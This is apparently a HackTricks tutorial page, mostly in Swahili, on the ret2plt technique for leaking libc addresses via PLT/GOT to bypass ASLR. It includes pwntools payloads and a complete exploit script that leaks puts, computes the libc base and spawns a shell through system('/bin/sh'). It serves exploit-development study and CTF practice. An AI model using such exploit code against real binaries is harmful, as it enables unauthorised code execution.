# Ret2plt {{#include ../../../banners/hacktricks-training.md}} ## Basic Information Lengo la mbinu hii ni **kuvuja anwani kutoka kwa kazi kutoka PLT** ili kuweza kupita ASLR. Hii ni kwa sababu ikiwa, kwa mfano, unavuja anwani ya kazi `puts` kutoka libc, unaweza kisha **kuhesabu ambapo msingi wa `libc` uko** na kuhesabu offsets ili kufikia kazi nyingine kama **`system`**. Hii inaweza kufanywa na payload ya `pwntools` kama ([**kutoka hapa**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got)): ```python # 32-bit ret2plt payload = flat( b'A' * padding, elf.plt['puts'], elf.symbols['main'], elf.got['puts'] ) # 64-bit payload = flat( b'A' * padding, POP_RDI, elf.got['puts'] elf.plt['puts'], elf.symbols['main'] ) ``` Note how **`puts`** (akitumia anwani kutoka PLT) inaitwa kwa anwani ya `puts` iliyoko katika GOT (Global Offset Table). Hii ni kwa sababu wakati **`puts`** inachapisha kipengee cha GOT cha puts, **kipengee hiki kitakuwa na anwani halisi ya `puts` katika kumbukumbu**. Pia angalia jinsi anwani ya `main` inavyotumika katika exploit ili wakati **`puts`** inamaliza utekelezaji wake, **binary inaita `main` tena badala ya kutoka** (hivyo anwani iliyovuja itaendelea kuwa halali). > [!CAUTION] > Note how in order for this to work the **binary cannot be compiled with PIE** or you must have **found a leak to bypass PIE** in order to know the address of the PLT, GOT and main. Otherwise, you need to bypass PIE first. You can find a [**full example of this bypass here**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/ret2plt-aslr-bypass). This was the final exploit from that **example**: ```python from pwn import * elf = context.binary = ELF('./vuln-32') libc = elf.libc p = process() p.recvline() payload = flat( 'A' * 32, elf.plt['puts'], elf.sym['main'], elf.got['puts'] ) p.sendline(payload) puts_leak = u32(p.recv(4)) p.recvlines(2) libc.address = puts_leak - libc.sym['puts'] log.success(f'LIBC base: {hex(libc.address)}') payload = flat( 'A' * 32, libc.sym['system'], libc.sym['exit'], next(libc.search(b'/bin/sh\x00')) ) p.sendline(payload) p.interactive() ``` ## Mifano Mingine & Marejeleo - [https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html) - 64 bit, ASLR imewezeshwa lakini hakuna PIE, hatua ya kwanza ni kujaza overflow hadi byte 0x00 ya canary ili kisha kuita puts na kuvuja. Kwa canary, gadget ya ROP inaundwa kuita puts ili kuvuja anwani ya puts kutoka GOT na gadget ya ROP kuita `system('/bin/sh')` - [https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html) - 64 bits, ASLR imewezeshwa, hakuna canary, overflow ya stack katika main kutoka kwa kazi ya mtoto. Gadget ya ROP kuita puts ili kuvuja anwani ya puts kutoka GOT na kisha kuita gadget moja. {{#include ../../../banners/hacktricks-training.md}}